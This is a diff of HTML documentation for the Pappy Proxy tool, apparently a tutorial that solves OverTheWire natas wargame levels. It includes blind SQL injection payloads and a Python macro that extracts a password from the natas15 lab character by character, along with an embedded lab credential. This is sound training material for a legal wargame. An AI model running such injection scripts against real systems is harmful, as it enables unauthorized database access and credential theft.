<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; gencerts
This will overwrite any existing certs in /home/anonymouse/pappy/pappyproxy/certs. Are you sure?
(y/N) y
Generating certs to /home/anonymouse/pappy/pappyproxy/certs
@ -194,7 +194,7 @@ pappy&gt;
<div class="section" id="testing-it-out">
<h3><a class="toc-backref" href="#id10">Testing it Out</a><a class="headerlink" href="#testing-it-out" title="Permalink to this headline"></a></h3>
<p>Start up Pappy in Lite mode by running <code class="docutils literal"><span class="pre">pappy</span> <span class="pre">-l</span></code>, enable the proxy in your browser, then navigate to a website:</p>
<div class="highlight-python"><div class="highlight"><pre>/pappynatas/ $ pappy -l
<div class="highlight-python"><div class="highlight"><pre><span></span>/pappynatas/ $ pappy -l
Temporary datafile is /tmp/tmp5AQBrH
Proxy is listening on port 8000
pappy&gt; ls
@ -219,7 +219,7 @@ Deleting temporary datafile
<div class="section" id="setting-the-scope">
<h3><a class="toc-backref" href="#id12">Setting the Scope</a><a class="headerlink" href="#setting-the-scope" title="Permalink to this headline"></a></h3>
<p>The first thing we&#8217;ll do is set up Pappy so that it only intercepts requests going to <code class="docutils literal"><span class="pre">*.natas.labs.overthewire.org</span></code>:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; filter host containsr &quot;natas\.labs\.overthewire\.org$&quot;
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; filter host containsr &quot;natas\.labs\.overthewire\.org$&quot;
pappy&gt; scope_save
</pre></div>
</div>
@ -249,7 +249,7 @@ pappy&gt; scope_save
<li><code class="docutils literal"><span class="pre">vfs</span> <span class="pre">&lt;reqid&gt;</span></code> prints the full response to a request you specify</li>
</ul>
<p>So to solve natas1, we&#8217;ll want to view the full response to our request to the page:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; ls
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
16 GET natas1.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
15 GET natas1.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
@ -295,7 +295,7 @@ pappy&gt;
<div class="section" id="natas-2">
<h3><a class="toc-backref" href="#id15">Natas 2</a><a class="headerlink" href="#natas-2" title="Permalink to this headline"></a></h3>
<p>When you visit this page, you get a message saying &#8220;There is nothing on this page&#8221;. That is probably a blatant lie. Let&#8217;s see what was in that response.:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; ls
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
30 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
29 GET natas2.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
@ -338,11 +338,11 @@ pappy&gt;
<li><code class="docutils literal"><span class="pre">fls</span></code> Show all currently applied filters</li>
</ol>
<p>The most complicated of these is the <code class="docutils literal"><span class="pre">filter</span></code> command since it takes a filter string as an argument. All a filter string is is a string that defines which requests will pass the filter. Anything that doesn&#8217;t pass the filter will be removed from the context. Most filter strings are of the format <code class="docutils literal"><span class="pre">&lt;field&gt;</span> <span class="pre">&lt;comparer&gt;</span> <span class="pre">&lt;value&gt;</span></code>. For example:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="n">host</span> <span class="ow">is</span> <span class="n">www</span><span class="o">.</span><span class="n">target</span><span class="o">.</span><span class="n">org</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="n">host</span> <span class="ow">is</span> <span class="n">www</span><span class="o">.</span><span class="n">target</span><span class="o">.</span><span class="n">org</span>
<span class="n">field</span> <span class="o">=</span> <span class="s">&quot;host&quot;</span>
<span class="n">comparer</span> <span class="o">=</span> <span class="s">&quot;is&quot;</span>
<span class="n">value</span> <span class="o">=</span> <span class="s">&quot;www.target.org&quot;</span>
<span class="n">field</span> <span class="o">=</span> <span class="s2">&quot;host&quot;</span>
<span class="n">comparer</span> <span class="o">=</span> <span class="s2">&quot;is&quot;</span>
<span class="n">value</span> <span class="o">=</span> <span class="s2">&quot;www.target.org&quot;</span>
</pre></div>
</div>
<p>This filter will only match requests whose host is exactly <code class="docutils literal"><span class="pre">www.target.org</span></code>. When defining our scope, we applied a filter using a <code class="docutils literal"><span class="pre">containsr</span></code> comparer. This matches any request where the field matches a regular expression. Here are a few fields and comparers:</p>
@ -367,7 +367,7 @@ pappy&gt;
<h4><a class="toc-backref" href="#id19">Finding Passwords</a><a class="headerlink" href="#finding-passwords" title="Permalink to this headline"></a></h4>
<p>While we can&#8217;t find all the passwords with one filter, if we remember how we got the password, we can find it pretty quickly</p>
<p>For natas0 and natas1, the responses had a phrase like &#8220;the password is abc123&#8221;. So we can filter out anything that doesn&#8217;t have the word &#8220;password&#8221; in it.:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; ls
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
52 GET natas4.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.26 --
51 GET natas4.natas.labs.overthewire.org /favicon.ico 404 Not Found 0 307 0.27 --
@ -425,23 +425,23 @@ pappy&gt;
<li><code class="docutils literal"><span class="pre">ic</span> <span class="pre">&lt;req|rsp&gt;+</span></code> Begin interception mode. Intercepts requests and/or responses as decided by the arguments given in the command. <code class="docutils literal"><span class="pre">ic</span> <span class="pre">req</span></code> will only intercept requests, <code class="docutils literal"><span class="pre">ic</span> <span class="pre">rsp</span></code> will only intercept responses, and <code class="docutils literal"><span class="pre">ic</span> <span class="pre">req</span> <span class="pre">rsp</span></code> will intercept both.</li>
</ul>
<p>In this case, we only want to intercept requests, so we&#8217;ll run <code class="docutils literal"><span class="pre">ic</span> <span class="pre">req</span></code>:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; ic req
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ic req
</pre></div>
</div>
<p>And we&#8217;ll get a screen that says something like:</p>
<div class="highlight-python"><div class="highlight"><pre>Currently intercepting: Requests
<div class="highlight-python"><div class="highlight"><pre><span></span>Currently intercepting: Requests
0 item(s) in queue.
Press &#39;n&#39; to edit the next item or &#39;q&#39; to quit interceptor.
</pre></div>
</div>
<p>Now refresh the page in your browser. The page will hang like it&#8217;s taking a long time to load. Go back to Pappy, and now the interceptor will say something like:</p>
<div class="highlight-python"><div class="highlight"><pre>Currently intercepting: Requests
<div class="highlight-python"><div class="highlight"><pre><span></span>Currently intercepting: Requests
1 item(s) in queue.
Press &#39;n&#39; to edit the next item or &#39;q&#39; to quit interceptor.
</pre></div>
</div>
<p>Press <code class="docutils literal"><span class="pre">n</span></code> and the request will be opened for editing! Which editor is used is defined by the <code class="docutils literal"><span class="pre">EDITOR</span></code> environment variable. Use the text editor to add a <code class="docutils literal"><span class="pre">Referer</span></code> header (note that there&#8217;s only one r):</p>
<div class="highlight-python"><div class="highlight"><pre>GET / HTTP/1.1
<div class="highlight-python"><div class="highlight"><pre><span></span>GET / HTTP/1.1
Host: natas4.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
@ -489,7 +489,7 @@ Referer: http://natas5.natas.labs.overthewire.org/
<p class="last">You must know the basics of how to use vim for the repeater and have a key bound to the leader. You can find more information on the leader key <a class="reference external" href="https://stackoverflow.com/questions/1764263/what-is-the-leader-in-a-vimrc-file">here</a>. By default &lt;leader&gt; is bound to <code class="docutils literal"><span class="pre">\</span></code>.</p>
</div>
<p>Submit a request then open that request in the repeater:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; ls
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ls
196 GET natas9.natas.labs.overthewire.org /index.php?needle=ball&amp;submit=Search 200 OK 0 1686 0.27 --
195 GET natas9.natas.labs.overthewire.org /index-source.html 200 OK 0 1952 0.27 --
... snip ...
@ -511,7 +511,7 @@ pappy&gt; rp 196
<li><code class="docutils literal"><span class="pre">rma</span> <span class="pre">&lt;name&gt;</span> <span class="pre">[args]</span></code> Run a macro, optionally with arguments</li>
</ul>
<p>So the first thing we&#8217;ll do is submit a request to have a base request that we can modify. Submit a request with any username. You should get a response back saying the user doesn&#8217;t exist. Now we&#8217;ll generate a macro and use that request as a base for our script:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; ls
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; ls
ID Verb Host Path S-Code Req Len Rsp Len Time Mngl
224 POST natas15.natas.labs.overthewire.org /index.php 200 OK 14 937 0.27 --
223 POST natas15.natas.labs.overthewire.org /index.php 200 OK 12 937 0.27 --
@ -528,44 +528,44 @@ pappy&gt;
</pre></div>
</div>
<p>Now open up <code class="docutils literal"><span class="pre">macro_brute.py</span></code> in your favorite text editor. You should have a script that looks like this:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="kn">from</span> <span class="nn">pappyproxy.http</span> <span class="kn">import</span> <span class="n">Request</span><span class="p">,</span> <span class="n">get_request</span><span class="p">,</span> <span class="n">post_request</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">from</span> <span class="nn">pappyproxy.http</span> <span class="kn">import</span> <span class="n">Request</span><span class="p">,</span> <span class="n">get_request</span><span class="p">,</span> <span class="n">post_request</span>
<span class="kn">from</span> <span class="nn">pappyproxy.context</span> <span class="kn">import</span> <span class="n">set_tag</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s">&#39;Macro 41855887&#39;</span>
<span class="n">SHORT_NAME</span> <span class="o">=</span> <span class="s">&#39;&#39;</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s1">&#39;Macro 41855887&#39;</span>
<span class="n">SHORT_NAME</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span>
<span class="c">###########</span>
<span class="c">## Requests</span>
<span class="c"># It&#39;s suggested that you call .copy() on these and then edit attributes</span>
<span class="c"># as needed to create modified requests</span>
<span class="c">##</span>
<span class="c1">###########</span>
<span class="c1">## Requests</span>
<span class="c1"># It&#39;s suggested that you call .copy() on these and then edit attributes</span>
<span class="c1"># as needed to create modified requests</span>
<span class="c1">##</span>
<span class="n">req1</span> <span class="o">=</span> <span class="n">Request</span><span class="p">((</span>
<span class="s">&#39;POST /index.php HTTP/1.1</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Host: natas15.natas.labs.overthewire.org</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Accept-Language: en-US,en;q=0.5</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Accept-Encoding: gzip, deflate</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Referer: http://natas15.natas.labs.overthewire.org/</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Connection: keep-alive</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Content-Type: application/x-www-form-urlencoded</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Content-Length: 14</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;username=admin&#39;</span>
<span class="s1">&#39;POST /index.php HTTP/1.1</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Host: natas15.natas.labs.overthewire.org</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept-Language: en-US,en;q=0.5</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept-Encoding: gzip, deflate</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Referer: http://natas15.natas.labs.overthewire.org/</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Connection: keep-alive</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Content-Type: application/x-www-form-urlencoded</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Content-Length: 14</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;username=admin&#39;</span>
<span class="p">))</span>
<span class="k">def</span> <span class="nf">run_macro</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
<span class="c"># Example:</span>
<span class="c"># req = req0.copy() # Copy req0</span>
<span class="c"># req.submit() # Submit the request to get a response</span>
<span class="c"># print req.response.raw_headers # print the response headers</span>
<span class="c"># req.save() # save the request to the data file</span>
<span class="c"># or copy req0 into a loop and use string substitution to automate requests</span>
<span class="c1"># Example:</span>
<span class="c1"># req = req0.copy() # Copy req0</span>
<span class="c1"># req.submit() # Submit the request to get a response</span>
<span class="c1"># print req.response.raw_headers # print the response headers</span>
<span class="c1"># req.save() # save the request to the data file</span>
<span class="c1"># or copy req0 into a loop and use string substitution to automate requests</span>
<span class="k">pass</span>
</pre></div>
</div>
@ -577,19 +577,19 @@ pappy&gt;
</ul>
<p>It is suggested you go through the documentation to learn the rest of the attributes/functions.</p>
<p>To start out simple, we&#8217;ll write a macro that lets us check a username from the Pappy console. To define a function, you define the <code class="docutils literal"><span class="pre">run_macro</span></code> function. The function is passed a list of arguments which represent the arguments entered. Here a <code class="docutils literal"><span class="pre">run_macro</span></code> function that we can define that will check if a user exists:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="k">def</span> <span class="nf">run_macro</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
<span class="n">to_check</span> <span class="o">=</span> <span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="c"># get the username to check</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">req1</span><span class="o">.</span><span class="n">copy</span><span class="p">()</span> <span class="c"># make a copy of the base request</span>
<span class="n">r</span><span class="o">.</span><span class="n">post_params</span><span class="p">[</span><span class="s">&#39;username&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">to_check</span> <span class="c"># set the username param of the request</span>
<span class="n">r</span><span class="o">.</span><span class="n">submit</span><span class="p">()</span> <span class="c"># submit the request</span>
<span class="k">if</span> <span class="s">&quot;This user doesn&#39;t exist.&quot;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">response</span><span class="o">.</span><span class="n">raw_data</span><span class="p">:</span> <span class="c"># check if the username is valid</span>
<span class="k">print</span> <span class="s">&quot;</span><span class="si">%s</span><span class="s"> is not a user&quot;</span> <span class="o">%</span> <span class="n">to_check</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="k">def</span> <span class="nf">run_macro</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
<span class="n">to_check</span> <span class="o">=</span> <span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="c1"># get the username to check</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">req1</span><span class="o">.</span><span class="n">copy</span><span class="p">()</span> <span class="c1"># make a copy of the base request</span>
<span class="n">r</span><span class="o">.</span><span class="n">post_params</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">to_check</span> <span class="c1"># set the username param of the request</span>
<span class="n">r</span><span class="o">.</span><span class="n">submit</span><span class="p">()</span> <span class="c1"># submit the request</span>
<span class="k">if</span> <span class="s2">&quot;This user doesn&#39;t exist.&quot;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">response</span><span class="o">.</span><span class="n">raw_data</span><span class="p">:</span> <span class="c1"># check if the username is valid</span>
<span class="k">print</span> <span class="s2">&quot;</span><span class="si">%s</span><span class="s2"> is not a user&quot;</span> <span class="o">%</span> <span class="n">to_check</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&quot;</span><span class="si">%s</span><span class="s"> is a user!&quot;</span> <span class="o">%</span> <span class="n">to_check</span>
<span class="k">print</span> <span class="s2">&quot;</span><span class="si">%s</span><span class="s2"> is a user!&quot;</span> <span class="o">%</span> <span class="n">to_check</span>
</pre></div>
</div>
<p>Then to run it:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; lma
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; lma
Loaded &quot;&lt;Macro Macro 41855887 (brute)&gt;&quot;
pappy&gt; rma brute admin
admin is not a user
@ -602,15 +602,15 @@ pappy&gt;
</div>
<p>Awesome! Notice how we didn&#8217;t have to deal with authentication either. This is because the authentication is handled by the <code class="docutils literal"><span class="pre">Authorization</span></code> header which was included in the generated request.</p>
<p>Time to add the SQL injection part. If we look at the source, we see that this is the SQL query that checks the username:</p>
<div class="highlight-python"><div class="highlight"><pre>$query = &quot;SELECT * from users where username=\&quot;&quot;.$_REQUEST[&quot;username&quot;].&quot;\&quot;&quot;;
<div class="highlight-python"><div class="highlight"><pre><span></span>$query = &quot;SELECT * from users where username=\&quot;&quot;.$_REQUEST[&quot;username&quot;].&quot;\&quot;&quot;;
</pre></div>
</div>
<p>So to escape it, we use a payload like:</p>
<div class="highlight-python"><div class="highlight"><pre>username&quot; OR 1=1; #
<div class="highlight-python"><div class="highlight"><pre><span></span>username&quot; OR 1=1; #
</pre></div>
</div>
<p>In this case, any username that ends in <code class="docutils literal"><span class="pre">&quot;</span> <span class="pre">OR</span> <span class="pre">1=1;</span> <span class="pre">#</span></code> will be considered a valid username. Let&#8217;s try this out:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; rma brute &quot;foo\&quot; OR 1=1;&quot;
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; rma brute &quot;foo\&quot; OR 1=1;&quot;
foo&quot; OR 1=1; is a user!
pappy&gt; rma brute &quot;fooooooo\&quot; OR 1=1;&quot;
fooooooo&quot; OR 1=1; is a user!
@ -618,62 +618,62 @@ pappy&gt;
</pre></div>
</div>
<p>Great! Now we can check any true/false condition we want. In this case, we want to check if a certain character is at a certain position in the <code class="docutils literal"><span class="pre">password</span></code> column. We do this with the <code class="docutils literal"><span class="pre">ASCII</span></code> and <code class="docutils literal"><span class="pre">SUBSTRING</span></code> functions. So something like this will check if the first character is an <code class="docutils literal"><span class="pre">A</span></code>.:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="s">&#39;natas16&quot; AND ASCII(SUBSTRING(password, 0, 1)) = 41; #&#39;</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="s1">&#39;natas16&quot; AND ASCII(SUBSTRING(password, 0, 1)) = 41; #&#39;</span>
</pre></div>
</div>
<p>Alright, let&#8217;s update our macro to find the first character of the password.:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="kn">from</span> <span class="nn">pappyproxy.http</span> <span class="kn">import</span> <span class="n">Request</span><span class="p">,</span> <span class="n">get_request</span><span class="p">,</span> <span class="n">post_request</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">from</span> <span class="nn">pappyproxy.http</span> <span class="kn">import</span> <span class="n">Request</span><span class="p">,</span> <span class="n">get_request</span><span class="p">,</span> <span class="n">post_request</span>
<span class="kn">from</span> <span class="nn">pappyproxy.context</span> <span class="kn">import</span> <span class="n">set_tag</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s">&#39;Macro 41855887&#39;</span>
<span class="n">SHORT_NAME</span> <span class="o">=</span> <span class="s">&#39;&#39;</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s1">&#39;Macro 41855887&#39;</span>
<span class="n">SHORT_NAME</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span>
<span class="c">###########</span>
<span class="c">## Requests</span>
<span class="c"># It&#39;s suggested that you call .copy() on these and then edit attributes</span>
<span class="c"># as needed to create modified requests</span>
<span class="c">##</span>
<span class="c1">###########</span>
<span class="c1">## Requests</span>
<span class="c1"># It&#39;s suggested that you call .copy() on these and then edit attributes</span>
<span class="c1"># as needed to create modified requests</span>
<span class="c1">##</span>
<span class="n">req1</span> <span class="o">=</span> <span class="n">Request</span><span class="p">((</span>
<span class="s">&#39;POST /index.php HTTP/1.1</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Host: natas15.natas.labs.overthewire.org</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Accept-Language: en-US,en;q=0.5</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Accept-Encoding: gzip, deflate</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Referer: http://natas15.natas.labs.overthewire.org/</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Connection: keep-alive</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Content-Type: application/x-www-form-urlencoded</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;Content-Length: 14</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;</span><span class="se">\r\n</span><span class="s">&#39;</span>
<span class="s">&#39;username=admin&#39;</span>
<span class="s1">&#39;POST /index.php HTTP/1.1</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Host: natas15.natas.labs.overthewire.org</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept-Language: en-US,en;q=0.5</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Accept-Encoding: gzip, deflate</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Referer: http://natas15.natas.labs.overthewire.org/</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Cookie: __cfduid=db41e9d9b4a13cc3ef4273055b71996fb1450464664</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Authorization: Basic bmF0YXMxNTpBd1dqMHc1Y3Z4clppT05nWjlKNXN0TlZrbXhkazM5Sg==</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Connection: keep-alive</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Content-Type: application/x-www-form-urlencoded</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;Content-Length: 14</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;</span><span class="se">\r\n</span><span class="s1">&#39;</span>
<span class="s1">&#39;username=admin&#39;</span>
<span class="p">))</span>
<span class="k">def</span> <span class="nf">check_char</span><span class="p">(</span><span class="n">char</span><span class="p">,</span> <span class="n">pos</span><span class="p">):</span>
<span class="n">payload</span> <span class="o">=</span> <span class="s">&#39;natas16&quot; AND ASCII(SUBSTRING(password, </span><span class="si">%d</span><span class="s">, 1)) = </span><span class="si">%d</span><span class="s">; #&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">pos</span><span class="p">,</span> <span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">))</span>
<span class="n">payload</span> <span class="o">=</span> <span class="s1">&#39;natas16&quot; AND ASCII(SUBSTRING(password, </span><span class="si">%d</span><span class="s1">, 1)) = </span><span class="si">%d</span><span class="s1">; #&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="n">pos</span><span class="p">,</span> <span class="nb">ord</span><span class="p">(</span><span class="n">char</span><span class="p">))</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">req1</span><span class="o">.</span><span class="n">copy</span><span class="p">()</span>
<span class="n">r</span><span class="o">.</span><span class="n">post_params</span><span class="p">[</span><span class="s">&#39;username&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">payload</span>
<span class="n">r</span><span class="o">.</span><span class="n">post_params</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">payload</span>
<span class="n">r</span><span class="o">.</span><span class="n">submit</span><span class="p">()</span>
<span class="k">if</span> <span class="s">&quot;This user doesn&#39;t exist.&quot;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">response</span><span class="o">.</span><span class="n">raw_data</span><span class="p">:</span>
<span class="k">if</span> <span class="s2">&quot;This user doesn&#39;t exist.&quot;</span> <span class="ow">in</span> <span class="n">r</span><span class="o">.</span><span class="n">response</span><span class="o">.</span><span class="n">raw_data</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">False</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">True</span>
<span class="k">def</span> <span class="nf">run_macro</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
<span class="n">valid_chars</span> <span class="o">=</span> <span class="s">&quot;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890&quot;</span>
<span class="n">valid_chars</span> <span class="o">=</span> <span class="s2">&quot;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890&quot;</span>
<span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">valid_chars</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&#39;Trying </span><span class="si">%s</span><span class="s">...&#39;</span> <span class="o">%</span> <span class="n">c</span>
<span class="k">print</span> <span class="s1">&#39;Trying </span><span class="si">%s</span><span class="s1">...&#39;</span> <span class="o">%</span> <span class="n">c</span>
<span class="k">if</span> <span class="n">check_char</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="mi">1</span><span class="p">):</span>
<span class="k">print</span> <span class="s">&#39;</span><span class="si">%s</span><span class="s"> is the first char!&#39;</span> <span class="o">%</span> <span class="n">c</span>
<span class="k">print</span> <span class="s1">&#39;</span><span class="si">%s</span><span class="s1"> is the first char!&#39;</span> <span class="o">%</span> <span class="n">c</span>
<span class="k">return</span>
<span class="k">print</span> <span class="s">&quot;The script didn&#39;t work&quot;</span>
<span class="k">print</span> <span class="s2">&quot;The script didn&#39;t work&quot;</span>
</pre></div>
</div>
<p>And when we run it...:</p>
<div class="highlight-python"><div class="highlight"><pre>pappy&gt; lma
<div class="highlight-python"><div class="highlight"><pre><span></span>pappy&gt; lma
Loaded &quot;&lt;Macro Macro 41855887 (brute)&gt;&quot;
pappy&gt; rma brute
Trying a...
@ -689,78 +689,78 @@ pappy&gt;
</pre></div>
</div>
<p>We find the first character! Woo! Next we just have to do this for each position. Even through we don&#8217;t know the length of the password, we will know that the password is over when none of the characters are valid. So let&#8217;s update our macro:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="kn">import</span> <span class="nn">sys</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">pappyproxy.http</span> <span class="kn">import</span> <span class="n">Request</span><span class="p">,</span> <span class="n">get_request</span><span class="p">,</span> <span class="n">post_request</span>
<span class="kn">from</span> <span class="nn">pappyproxy.context</span> <span class="kn">import</span> <span class="n">set_tag</span>
<span class="n">MACRO_NAME</span> <span class="o">=</span> <span class="s">&#39;Macro 41855887&#39;</span>
<span class="n">SHORT_NAME</span> <span class="o">=</span> <span class="s">&#39;&#39;</span>
